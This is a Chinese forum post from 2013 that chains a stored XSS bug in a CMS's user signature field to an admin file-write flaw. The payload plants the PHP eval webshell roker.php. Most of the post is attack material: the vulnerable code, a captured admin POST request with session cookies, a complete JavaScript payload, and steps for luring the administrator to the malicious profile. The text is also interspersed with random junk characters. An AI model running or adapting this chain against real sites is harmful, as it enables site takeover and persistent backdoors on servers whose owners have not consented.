|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题( b0 V2 G0 t% m
官网已经修补了,所以重新下了源码* c: X9 U0 l: x6 a" n! e6 u0 R: x
因为 后台登入 还需要认证码 所以 注入就没看了。
& Z) K" r# X9 l$ F2 S; S存在 xss
; D/ ?( |, b. @+ Q3 o7 w漏洞文件 user/member/skin_edit.php
! V3 E$ K' w4 V+ T本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
8 M( s+ s& F3 L- [ ' b: V* z5 M3 L! b2 F6 U1 `- ~
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>0 q+ L* \/ g! Q6 V' [% m8 ]0 s! h! p
3 Z# H8 M' f6 B3 H) q</textarea></td></tr>7 i1 x, y2 u1 t, r& V; e2 K; s
# L* X' A. {' ~% Y# V0 _) T3 j" Y
user/do.php ( A4 @( |, \) o- _
. C9 Y$ ~% A6 x) [2 y% h4 z7 L3 h3 u# Z4 m' i
if($op=='zl'){ //资料
$ c6 y1 [, I. P " p) [4 V. m6 T$ ?
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
( B8 a6 j! w( v& s a. y exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
0 B4 g9 c9 z1 E, P" _ 7 T5 G! j7 R w6 f9 T: w
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
; ~" f( x( K \* D$ P - i1 C3 g5 v# m* d
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' s0 ]. A7 J* w& O
where CS_Name='".$cscms_name."'";9 i( j) I0 S) r! S: n
* O4 h- \* S f/ i1 n if($db->query($sql)){
$ E2 z4 O. U, `: X & i$ L' l! b4 i5 R9 K
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
0 f/ ~2 |* ~% ?; Z8 R/ p
q7 e7 T' A V0 Z3 ? }else{5 w/ s( f! U, b! O8 C
; [% m& N2 Q; b4 K3 r- N exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
8 G3 |7 s& v1 v N L5 L) z. A4 T
( i+ d. c/ D- S6 w A+ G }) n/ O0 ?+ |5 {3 j7 Q4 C
- D6 b( p4 i( C) ^# z0 z
7 q" v( q& F9 Z8 T6 @$ i$ `没有 过滤导致xss产生。
$ k g! t6 B9 Z# O后台 看了下 很奇葩的是可以写任意格式文件。。! R$ I8 M9 d2 k+ J6 A' [
抓包。。" t& U9 N& d( m+ K( Q
4 d& Q( C& q: ?! C( o8 w. h
1 h" ]1 x- f2 i4 t o
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1+ q4 p) U; ~ i8 r0 _
% m$ o8 a! R* T, V; I- BAccept: text/html, application/xhtml+xml, */*
+ S0 w8 ?% P8 |) P+ W- { & k, K7 M# [# d! }" \
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
: O* d# s k. p2 d$ P
4 g! T4 M6 }* D/ x. h. ^) a1 gAccept-Language: zh-CN
* n( \6 H% X; \: W4 B3 a " }/ V0 Q# w2 t
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" O" J S# t- `
" } p& |! j$ Z& d; R" x1 c+ v2 C/ MContent-Type: application/x-www-form-urlencoded
- @! p" ^4 u3 a% U. A8 j4 L. X v5 ], f5 o$ v6 L( {4 G
Accept-Encoding: gzip, deflate+ ]+ B6 e b3 P8 [' h- D+ K
1 z0 i/ o2 a+ K) j1 ]/ { I, xHost: 127.0.0.1
# W5 {/ v! \9 B: Z) X6 ]; \7 C
j: d9 b+ |& K; u3 A5 ^Content-Length: 38# o* u! X" \% L, ~
' U9 V, o$ m* V9 j1 V
DNT: 1
7 Q4 H7 o, z. J ) F/ n/ `+ U5 c
Connection: Keep-Alive& ^+ m$ c- u3 X& B& ` A
. Q4 R( z, k# V8 k3 oCache-Control: no-cache+ q8 |! p6 `. v, p9 M
) T% f) m" {! o# [ X7 XCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
# V$ F: ?) ~' h/ F6 ` ) \" A* M/ ^ y0 T' f/ w
. G$ e' O2 X& a* d8 N- xname=aaa.php&content=%3Cs%3E%3Ca%25%3E
) E; |) h3 h5 R7 P
3 j% f# I @( k
7 m! l- Q% B6 q8 h" }8 M4 E1 |0 ~! N! V9 S( v& l; p
于是 构造js如下。
, W# F' C" U+ ]/ c1 }1 m; P7 s# n& _3 f! X' P$ }: R- |. ?
本帖隐藏的内容<script> , j; D, {1 _' v/ L/ S
thisTHost = top.location.hostname;3 U. `3 ^/ r3 S# g6 A/ s
2 _3 y5 T! D9 h& c
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";- P9 b/ A2 Y$ l. W: g Z" ]+ `0 X
' h/ D' k# v6 _! y: |) [function PostSubmit(url, data, msg) {
2 t# x' {0 }5 d: F n( s1 | var postUrl = url;' N |% \+ ^- E7 u% L& i
$ _# G! K( }5 W4 ?
var postData = data;
% Y2 p/ u$ [8 k4 R/ Y p var msgData = msg;
, Y) a8 L* q) v3 P7 U8 b/ | var ExportForm = document.createElement("FORM"); ; X* Y+ l; O# N4 {2 V
document.body.appendChild(ExportForm);
3 ?0 Z' w0 h/ m3 h0 [ ExportForm.method = "POST"; % E5 E, | W2 O% k
var newElement = document.createElement("input"); * N$ O1 [8 C) s/ H: `. k4 l
newElement.setAttribute("name", "name");
* g* O: Y) X3 F4 B& Q$ r0 `/ y newElement.setAttribute("type", "hidden"); 9 H V% ?. J! g& b$ e
var newElement2 = document.createElement("input");
! a, |3 P4 Q0 o' H2 ] newElement2.setAttribute("name", "content"); 5 p4 z" Z; X2 ^7 X4 b5 l E! X
newElement2.setAttribute("type", "hidden");
* B+ n! t1 E4 T' o( L2 J ExportForm.appendChild(newElement);
4 {0 ]( V$ n0 j% }* \+ } ExportForm.appendChild(newElement2);
Y2 p' @0 J# F9 M3 V: A" A) { newElement.value = postData; 5 s, _" i8 D5 g5 q) ]
newElement2.value = msgData; % B% _4 W7 P) k9 u2 w" ^) R5 G% p
ExportForm.action = postUrl;
; L0 @$ @1 O( h6 N% S. O: [ ExportForm.submit();
9 U- i2 q3 m) d3 e* ^6 G; g};
; l* q! p4 }+ {: |
7 n8 z1 x2 s4 Q' }) ]* C2 h JPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");$ ]4 \8 A1 m5 q! H/ f! P( Z
. E1 L2 ?- h& B/ |+ \( h' C
</script>
4 b/ j/ @! A& t, m4 e
$ V" Q J0 a* ~1 W6 H
" d/ \1 L/ G7 Y1 z% J
/ c) i, c- Y3 B9 Nhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入" i9 R+ o. O2 t
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
~1 y, M$ F; z" y就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
% W" \ f2 g2 _. }5 ^ |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对